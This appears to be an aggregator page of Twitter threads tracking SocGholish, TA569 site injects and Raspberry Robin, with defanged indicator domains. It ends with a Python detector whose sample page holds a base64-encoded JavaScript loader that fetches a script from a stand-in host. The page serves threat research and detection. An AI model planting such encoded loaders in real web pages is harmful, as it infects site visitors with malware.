Discover and read the best of Twitter Threads about #SocGholish

Most recents (4)

1/ Part of the script used by #TA569 (Initial Access Broker) to inject the Keitaro TDS code into compromised sites 🚩

In this variant, if the IP is correct and the red_ok cookie is not declared, the injection is shown and the infection flow continues until #SocGholish or others.
2/ Two #KeitaroTDS domains in use by #TA569:
- jqueryns[.]com
- jqscr[.]com "new"

In the IP of the latter there is also the domain jqueryj[.]com with a panel that at first sight I cannot recognize 🧐 but is some kind of bot/stealer/clipper, very likely related. / @ViriBack
3/ To get an idea of the scope, if we search on publicwww for the domain "jqueryns[.]com" we get 2196 infected sites, for the domain "jqscr[.]com" we get another 196 compromised sites so far.

- publicwww.com/websites/%22jq…
- publicwww.com/websites/%22jq…

More results in Google too 🤦‍♂️
Read 5 tweets
Proofpoint Threat Research has observed intermittent injections on a media company that serves many major news outlets. This media company serves content via #Javascript to its partners. By modifying the codebase of this otherwise benign JS, it is now used to deploy #SocGholish.
We track this actor as #TA569. TA569 historically removed and reinstated these malicious JS injects on a rotating basis. Therefore the presence of the payload and malicious content can vary from hour to hour and shouldn't be considered a false positive.
Proofpoint observed TA569 injects within the assets of a media company used by multiple major news orgs. More than 250 regional/national newspaper sites have accessed the malicious Javascript. The actual number of impacted hosts is known only by the impacted media company.
Read 5 tweets
Raspberry Robin is a malware that has been around for some time now and spreads via infected USB drives.
Here is what we have seen over the last 10 months. 🧵 1/12 #RaspberryRobin #malware

via @lazy_daemon
@sekoia_io and @redcanary have already published excellent technical analyses of this malware, so we won't go into more detail about it.

7095517.fs1.hubspotusercontent-na1.net/hubfs/7095517/…

redcanary.com/blog/raspberry…

🧵 2/12
Since December 2021, we've seen several cases mostly in Hungary🇭🇺 and Germany🇩🇪 but also a few in Russia🇷🇺 and India🇮🇳.
The user always clicked the malicious link, so no automatic infection when the USB drive was plugged in. 🧵 3/12
Read 12 tweets
Just a quick bit of clarification on #SocGholish on how I personally view the stages/infra.

Thread
Stage 1: The injected site. These are compromised sites where a JavaScript implant is present in the HTML Source of the page.

These are plentiful (more than 1000 active at any time).

They come in 2 varieties currently:

1x B64 encoded and 2x B64 encoded
Stage 2: Payload host, aka the site Stage 1 pulls the "fakeupdate" from (/report/blah).

These are less plentiful than Stage 1. Their TTL is measured in days or weeks. There are some currently that are approaching months.

These are a more reliable IOC to block vs Stage 1.
Read 11 tweets
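A defender's triage helper for the Stage 1 characteristic described in the thread above (inline injects that are base64-encoded once or twice). This is an added example, not code from the thread's author; the sample HTML, the payload.example host, the marker list and the two-layer limit are constructed assumptions.

```python
import base64
import binascii
import re

# Constructed sample page (not a real inject): one benign script, one script
# carrying a once-base64-encoded loader, one carrying a twice-encoded loader.
INNER_JS = ("var s=document.createElement('script');"
            "s.src='https://payload.example/report/';"
            "document.head.appendChild(s);")
ONE_LAYER = base64.b64encode(INNER_JS.encode()).decode()
TWO_LAYER = base64.b64encode(ONE_LAYER.encode()).decode()
SAMPLE_HTML = f"""<html><head>
<script>window.dataLayer = window.dataLayer || [];</script>
<script>eval(atob("{ONE_LAYER}"));</script>
</head><body><p>hello</p>
<script>eval(atob(atob("{TWO_LAYER}")));</script>
</body></html>"""

SCRIPT_RE = re.compile(r"<script[^>]*>(.*?)</script>", re.I | re.S)
B64_RE = re.compile(r"[A-Za-z0-9+/]{40,}={0,2}")
# Every marker contains a character outside the base64 alphabet, so an
# intermediate (still-encoded) layer can never be mistaken for decoded JS.
JS_MARKERS = ("document.", "createElement(", "atob(", ".src")


def peel_base64(blob, max_layers=2):
    """Decode up to max_layers of base64; return (layers, js) or None."""
    text = blob
    for layer in range(1, max_layers + 1):
        try:
            decoded = base64.b64decode(text, validate=True).decode("utf-8")
        except (binascii.Error, UnicodeDecodeError):
            return None  # not base64, or binary: not an encoded script
        if any(marker in decoded for marker in JS_MARKERS):
            return layer, decoded
        text = decoded  # no JS yet: try one more layer


def find_encoded_injects(html):
    """(layers, decoded_js) for each base64 blob in inline scripts that decodes to JS."""
    hits = []
    for body in SCRIPT_RE.findall(html):
        for blob in B64_RE.findall(body):
            result = peel_base64(blob)
            if result:
                hits.append(result)
    return hits


if __name__ == "__main__":
    for layers, js in find_encoded_injects(SAMPLE_HTML):
        print(f"{layers}x base64 -> {js[:60]}...")
```

Flagged blobs are a starting point for review, not a verdict: legitimate sites also embed base64 in inline scripts, so compare the decoded loader's target host against the page's own assets before blocking.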
